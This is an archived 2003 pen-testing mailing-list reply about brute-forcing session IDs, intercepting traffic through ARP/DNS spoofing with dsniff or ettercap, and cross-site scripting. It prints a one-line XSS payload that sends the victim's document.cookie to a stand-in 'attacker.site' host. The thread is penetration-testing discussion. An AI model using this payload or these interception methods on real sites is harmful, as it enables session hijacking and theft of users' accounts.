RE: Proof of Concept Tool on Web Application Security

From: Dawes, Rogan (ZA - Johannesburg) (rdawes@deloitte.co.za)
Date: 04/11/03

  • Next message: Rus Foster: "Re: BIND/DNS Version check"
    From: "Dawes, Rogan (ZA - Johannesburg)" <rdawes@deloitte.co.za>
    To: 'Indian Tiger' <indiantiger@mailandnews.com>, pen test <Pen-test@securityfocus.com>
    Date: Fri, 11 Apr 2003 09:11:45 +0200
    
    

    Hi,

    As far as brute forcing session ids goes, you could have a look at a post
    that I sent to the mobile code mailing list a while back for some
    techniques, and some code. That was focused on identifying the patterns in
    the cookie sequence, but once you have done that, it should be relatively
    easy to identify what the possibilities are for the next cookie, simply by
    reversing the algorithm - instead of calculating an integer from a character
    string, calculate a character string from the integer.

    http://www.pantek.com/library/general/lists/securityfocus.com/webappsec/msg0
    0552.html

    Alternatively, take a look at iDefense's cookie and sessionid brute force
    tool. Sorry, I forget the name at the moment.

    The key to intercepting traffic is to understand the tools that are
    available, and put them to use in creative ways.

    For example, you could use the arp spoofing or DNS spoofing tools from the
    dsniff suite to redirect traffic on your local segment from the proxy to
    your own machine. Alternatively, investigate ettercap which could also
    possibly do this.

    Then run something like WebSleuth, Exodus
    (http://mysite.mweb.co.za/residents/rdawes/exodus.html), the dsniff webmitm
    , or your favourite proxy program to monitor traffic sent to the proxy, and
    alter it as you wish, prior to sending it off to the real proxy, or out via
    the router.

    Cross Site scripting is mostly useful to compromise the user's sessionid, to
    save you the effort of brute forcing it. E.g. if you could get the victim to
    execute the following code, you could simply collect their sessionid, and
    use it yourself.

    [script language=javascript]document.print("<img
    src='http://attacker.site/snarf?" + document.cookie + "'>")[/script]

    Alternatively, you could make them submit a form containing whatever
    information you want, that could possibly elevate your own privileges (if
    the victim is an administrator) etc

    Have fun!

    Rogan
    -----Original Message-----
    From: Indian Tiger [mailto:indiantiger@mailandnews.com]
    Sent: 15 April 2003 08:06 PM
    To: pen test
    Subject: Proof of Concept Tool on Web Application Security

    Hi all,

    I have tried a lot to find any Proof of Concept Tool on Web Application
    Security but still I am not able to find a single one. Let me give some
    specific details.

    Session ID
    Generally session ID is big enough and act as authentication token. Most of
    the time it only changes last few digits, lets say only three digits from
    the end. Even its doing this only its very tuff to guess these last three
    digits. I have made a testing site and tried but was not able to do that. I
    knew session ID is not the only authentication parameter. It can contain
    cookie, session tokens etc as well. I have tried Achilles, Web Sleuth, Web
    Inspect, Spike Proxy etc. I think at least they don't do such brute force.
    Is there any tool which does brute force on this and give session ID.

    Cookie Manipulation
    Several Articles talk about Cookie Manipulation. How to get cookies of
    others even in a LAN seems very tuff or not possible as per my study on Web.
    If a Attacker is able to redirect other person's traffic to any Proxy like
    Achilles, Web Sleuth than he can perform attacks. Now nobody is allowing to
    change his proxy setting and sending his output through Attacker (Proxy).
    Is there any tool which can give access/manipulate the cookie remotely?

    This manipulation can also be achieved if an Attacker can put his Proxy (Web
    Sleuth) on intermediate Router/Proxy. One Example is I am accessing Hotmail
    and on my ISP Router/Proxy, An attacker installs tool like Web Sleuth. But
    again question comes Router works on OSI layer 3 so attacker can't put tool
    like Web Sleuth. If intermediate hop is Proxy which is on Application level,
    there should be some tool which can be placed here.

    XSS
    Cross Site Scripting has to use Client site scripting only. What could be
    the maximum impact of this? Can Attacker format a machine or steal data by
    this? If yes how?

    Please also tell any other Proof of Concept Tool on Web Application
    Security. I read OWASP guides, WebGoat and some more to understand three
    things deeply and develop Proof of Concept Tool but no successes accept
    Hidden field manipulation. Please recommend some good guides on this.

    Any help on this would be highly appreciated.

    Thanking You.
    Sincerely,

    Indian Tiger, CISSP

    --------------------------------------------------------------
    Costs are climbing and complaints are rising
    as SPAM overloads your e-mail servers and Inboxes
    SurfControl E-mail Filter puts the brakes on spam & viruses
    and gives you the reports to prove it.
    http://www.securityfocus.com/SurfControl-pen-test2
    Download a free trial and see just
    what's going in and out of your organization.
    --------------------------------------------------------------

    --------------------------------------------------------------
    Costs are climbing and complaints are rising
    as SPAM overloads your e-mail servers and Inboxes
    SurfControl E-mail Filter puts the brakes on spam & viruses
    and gives you the reports to prove it.
    http://www.securityfocus.com/SurfControl-pen-test2
    Download a free trial and see just
    what's going in and out of your organization.
    --------------------------------------------------------------


  • Next message: Rus Foster: "Re: BIND/DNS Version check"

    Relevant Pages

    • Re: php session without cookie useage
      ... >> transfer a session key created on login to subsequent pages via a POST ... >> browser via a cookie or via POST or GET. ... the session ID in stored URLs in the browser history. ... That may block legitimate users using a round-robin proxy (different ...
      (comp.lang.php)
    • Re: php session without cookie useage
      ... >>> browser or the application to maintain the state if needed. ... >>> transfer a session key created on login to subsequent pages via a POST ... >>> browser via a cookie or via POST or GET. ... > That may block legitimate users using a round-robin proxy (different ...
      (comp.lang.php)
    • Re: [Sessions] Why are they more secure?
      ... session and saved as a cookie, as a way to identify a user, and keep ... and bypass the login/password step by simply creating a cookie ... start Your sesion, You're stuck to one given proxy, and until You reboot Your ... I have never saw such occasion in real practice (excluding some ...
      (comp.lang.php)
    • Re: Sessions vs Cookies
      ... There is a session cookie which simply allows the server to identify the client and retrieve relevant session data for it. ... If cookies can be read or forged, it makes little odds whether you have the master key or all the little keys,. ... Suppose you only send the PHPSESSID: Now you cannot change a thing on the server, even if you have the 'master key'. ...
      (comp.lang.php)
    • Re: session wont timeout
      ... Maybe this is a session cookie issue? ... client browser there is this one: WSS_KeepSessionAuthenticated Expires: At ... If I kill the session cookie using IE Developer Toolbar, ... possible and IIS would throw another challenge. ...
      (microsoft.public.sharepoint.windowsservices)